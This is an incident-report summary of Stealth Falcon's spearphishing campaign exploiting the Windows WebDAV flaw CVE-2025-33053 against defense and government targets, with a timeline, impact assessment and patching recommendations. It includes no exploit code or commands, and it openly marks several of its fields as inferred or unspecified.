Full Report
Check Point attributed the attack to a group known as Stealth Falcon — a hacking group with longstanding ties to the UAE that has been implicated in dozens of spyware cases and hacking incidents involving governments across the Middle East and Africa.
Analysis Summary
# Incident Report: Windows Zero-Day Exploitation by Stealth Falcon via WebDAV Vulnerability
## Executive Summary
A significant security incident involved the exploitation of a Windows zero-day vulnerability (CVE-2025-33053) affecting the WebDAV component, used primarily in government and defense sectors in the Middle East and Africa. The attack, traced to the APT group Stealth Falcon, leveraged weaponized URL files delivered via phishing to achieve remote code execution. Microsoft subsequently released a patch following discovery by Check Point researchers during the investigation of an attempted intrusion against a Turkish defense organization.
## Incident Details
- **Discovery Date:** March (Discovery during investigation of an attempted attack) - Confirmed by Check Point publication/Microsoft Patch Tuesday in June.
- **Incident Date:** Began in or before March (when the attack was being investigated).
- **Affected Organization:** A major defense organization in Turkey (Initial sighting); other targets include governments in Qatar, Egypt, and Yemen.
- **Sector:** Government, Defense.
- **Geography:** Turkey, focusing on targets in the Middle East and Africa.
## Timeline of Events
### Initial Access
- **Date/Time:** Prior to March (when the investigation began).
- **Vector:** Spearphishing email delivering a disguised `.url` file.
- **Details:** The file was disguised as a PDF document related to military equipment damage. Clicking this file allowed attackers to silently run arbitrary code from a remote server.
### Lateral Movement
- **Details:** Not explicitly detailed, but custom tools (Horus Agent and Horus Loader) were used, suggesting post-exploitation activity for espionage.
### Data Exfiltration/Impact
- **Details:** The campaign's objective was espionage, utilizing custom tools for stealthy operations.
### Detection & Response
- **Detection:** Discovered by Check Point researchers while investigating an attempted cyberattack on a Turkish defense organization.
- **Response:** Microsoft released a fix for CVE-2025-33053 in its June Patch Tuesday update. CISA added the vulnerability to its catalog of exploited vulnerabilities.
## Attack Methodology
- **Initial Access:** Exploitation of Windows WebDAV vulnerability (CVE-2025-33053) triggered by clicking a crafted URL file delivered via spearphishing.
- **Persistence:** Implied through the use of custom-built implants (Horus Agent/Loader).
- **Privilege Escalation:** Not explicitly detailed, but likely leveraged by the initial remote code execution.
- **Defense Evasion:** Use of custom-made tools (Horus Agent and Horus Loader) designed to avoid security tools.
- **Credential Access:** Not specified.
- **Discovery:** Not specified.
- **Lateral Movement:** Implied use of custom malware for internal reconnaissance/access.
- **Collection:** Espionage efforts using custom implants.
- **Exfiltration:** Implied based on espionage objectives.
- **Impact:** Compromise leading to espionage operations.
## Impact Assessment
- **Financial:** Not disclosed.
- **Data Breach:** Data related to espionage targets (governments/defense organizations) likely collected; specific volume/type not disclosed.
- **Operational:** Potential disruption to the targeted defense organization; the presence of a zero-day indicates significant security risk prior to patching.
- **Reputational:** Damage to affected organizations due to espionage; Stealth Falcon's notoriety contributes to reputational risk for the region.
## Indicators of Compromise
- **Network indicators:** Attackers controlled remote servers used to host malicious code.
- **File indicators:** Weaponized `.url` files disguised as PDFs; custom malware named "Horus Agent" and "Horus Loader."
- **Behavioral indicators:** Silent remote code execution triggered by clicking a specific URL/file type. The activity is consistent with well-resourced APT espionage operations.
## Response Actions
- **Containment measures:** Not specified, but the crucial action was the deployment of Microsoft's patch.
- **Eradication steps:** Not specified, but would involve removal of custom implants (Horus Agent/Loader) from affected systems.
- **Recovery actions:** Not specified, but likely involved environment scanning and verifying patch deployment.
## Lessons Learned
- **Key takeaways:** Well-resourced APTs like Stealth Falcon actively acquire and deploy zero-day exploits against high-value targets (government/defense). Custom malware allows for advanced defense evasion.
- **What could have been done better:** Organizations relying on legacy components or outdated configurations are highly susceptible to exploitation through deceptively simple vectors like malicious URL files.
## Recommendations
- **Prevention measures for similar incidents:** Immediately apply security patches, especially those addressing vulnerabilities added to the CISA Known Exploited Vulnerabilities catalog. Implement rigorous email security controls to detect and block suspicious file types and URL links. Enhance endpoint detection and response (EDR) capabilities to detect novel custom malware behavior inherent in APT toolsets like Horus Agent/Loader.